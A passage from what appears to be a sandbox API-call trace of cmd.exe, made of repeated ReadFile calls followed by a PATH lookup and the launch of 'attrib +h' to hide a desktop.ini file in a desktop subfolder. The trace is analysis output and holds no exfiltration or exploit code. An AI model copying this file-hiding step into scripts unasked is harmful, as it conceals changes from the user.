(in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.667] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, 
lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.668] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.668] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.668] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.668] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.668] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.668] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.668] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.668] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.668] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.668] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.668] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.668] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.669] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.669] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.669] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.669] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.669] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.669] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.669] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.669] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.669] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.669] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.669] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.669] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.669] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.669] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.670] ReadFile (in: hFile=0x58, 
lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.670] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.670] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.670] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.670] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.670] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.670] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.670] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.670] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.670] ReadFile 
(in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.670] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.670] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.671] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.671] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.671] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.671] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.671] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.671] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 
[0134.671] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.671] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.671] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.671] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.671] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.671] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.671] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.672] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.672] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, 
lpOverlapped=0x0) returned 1 [0134.672] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.672] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.672] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.672] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.672] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.672] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.672] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.672] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.672] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, 
lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.672] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.672] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.673] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.673] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.673] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.673] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.673] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.673] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.673] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: 
lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.673] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.673] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.673] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.673] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.673] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.693] _close (_FileHandle=4) returned 0 [0134.693] FindNextFileW (in: hFindFile=0x20e6a8, lpFindFileData=0x1cef80 | out: lpFindFileData=0x1cef80) returned 0 [0134.694] GetLastError () returned 0x12 [0134.694] FindClose (in: hFindFile=0x20e6a8 | out: hFindFile=0x20e6a8) returned 1 [0134.694] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0134.696] _close (_FileHandle=3) returned 0 [0134.696] GetConsoleTitleW (in: lpConsoleTitle=0x1cf3b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.696] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0134.696] 
NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0134.696] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0134.697] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x1cec54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cec54) returned 0xffffffff [0134.697] GetLastError () returned 0x2 [0134.697] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x1cec54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cec54) returned 0xffffffff [0134.697] GetLastError () returned 0x2 [0134.697] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x1cec54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cec54) returned 0x20e6a8 [0134.697] FindClose (in: hFindFile=0x20e6a8 | out: hFindFile=0x20e6a8) returned 1 [0134.697] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x1cec54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cec54) returned 0xffffffff [0134.697] GetLastError () returned 0x2 [0134.697] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x1cec54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cec54) returned 0x20e6a8 [0134.697] FindClose (in: hFindFile=0x20e6a8 | out: hFindFile=0x20e6a8) returned 1 [0134.697] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0134.697] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0134.697] GetConsoleTitleW (in: lpConsoleTitle=0x1cf14c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.737] 
InitializeProcThreadAttributeList (in: lpAttributeList=0x1cefd4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cf09c | out: lpAttributeList=0x1cefd4, lpSize=0x1cf09c) returned 1 [0134.737] UpdateProcThreadAttribute (in: lpAttributeList=0x1cefd4, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cf094, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cefd4, lpPreviousValue=0x0) returned 1 [0134.737] GetStartupInfoW (in: lpStartupInfo=0x1cef90 | out: lpStartupInfo=0x1cef90*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0134.738] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0134.738] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1cf030*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cf07c | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" ", lpProcessInformation=0x1cf07c*(hProcess=0x4c, hThread=0x50, dwProcessId=0xc30, dwThreadId=0xc34)) returned 1 [0134.739] CloseHandle (hObject=0x50) returned 1 [0134.739] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0134.739] 
